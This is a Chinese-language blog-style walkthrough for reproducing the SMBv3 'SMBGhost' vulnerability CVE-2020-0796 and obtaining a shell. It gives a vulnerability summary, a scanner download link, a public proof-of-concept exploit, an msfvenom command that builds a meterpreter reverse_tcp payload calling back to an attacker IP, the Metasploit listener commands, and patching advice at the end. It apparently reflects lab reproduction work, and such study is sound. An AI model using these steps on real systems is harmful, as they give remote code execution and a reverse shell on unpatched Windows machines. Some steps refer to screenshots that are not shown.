CVE-2020-0796(SMBv3)漏洞复现获取shell

漏洞介绍

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

漏洞发现

扫描有漏洞的IP

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

漏洞利用

1、EXP脚本下载,下载后,利用kali生成反弹shell的shellcode https://github.com/chompie1337/SMBGhost_RCE_PoC.git

//  20.143为Kali的IP

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.143 lport=4444 -f py -o exp.py

2、编辑 exp.py文件,将buf替换成USER_PAYLOAD

3、再打开exploit.py,将USER_PAYLOAD部分全部替换成 exp.py口的USER_PAYLOAD部分,如图红框内全部替换

4、打开msf,监听本地kali 4444端口,设置本地kali的IP

root@kali:~# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.20.143
run

5、运行exploit.py脚本,反弹shell

6、此时,已经获取到shell

另一台:

修复方法

1、使用系统自带的windows update补丁更新服务,更新微软漏洞补丁(慢); 

2、使用360 、腾讯管家等工具修复漏洞(建议);

如长期未更新过,可能需要 更新完、重启、再更新、再重启,操作多次 ,因为有些补丁有依赖关系。